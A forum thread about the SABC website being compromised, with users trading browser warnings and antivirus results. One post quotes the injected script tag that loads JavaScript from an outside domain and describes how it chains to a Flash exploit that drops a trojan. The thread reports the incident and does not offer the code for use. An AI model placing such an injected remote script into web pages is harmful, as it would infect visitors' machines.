SABC site hacked

Anyone gone to www.sabc.co.za recently using FF 3 - it lists it as

This web site at www.sabc.co.za has been reported as an attack site and has been blocked based on your security preferences.

Update: Holy cow! They are infected - I go there with IE and my AV picks up the VBS/Psyme virus!!!!!

after some more digging I can confirm that sabc has been exploited. they have had html code injected onto their web page.

The following code is called: <script src=http://www.dota11.cn/m.js>

Which in turn loads a htm file which then tries to infect your machine with a trojan - which is done by making use of the latest shockwave vulnerability.

I've tried to find an email address off the web site but looks like the contact us is broken too.

pretty scary - especially with all the older version of flash out there. I"m managed to mail the webmaster - lets see what happens.

Silent love, China

Lol, quite interesting...

No warnings here though. Seems like my antivirus and stuff are doing their job! :D

I saw so. I even went to it directly, nothing odd happened.

...feeling quite adventurous tonight :p

Nothing to detect :) I might not have the latest FF, but my Flash player is the latest!

In any case, they say that IE is more vulnerable to this exploit than FF. :D

Right ..... so I have this list of pr0n sites that I would love to find out about safety wise ............ *gets list ready to send* :p:p:p:D

Send away! :p :D

Google and McAfee SiteAdvisor could maybe help you better than I would be able to though ;) :p

I only ever use Siteadvisor to check what others say about a site ..... they themselves are pretty useless .... giving green lights to sites that aren't safe. Fsck that :D

why visit the sabc site is the more pertinent question?
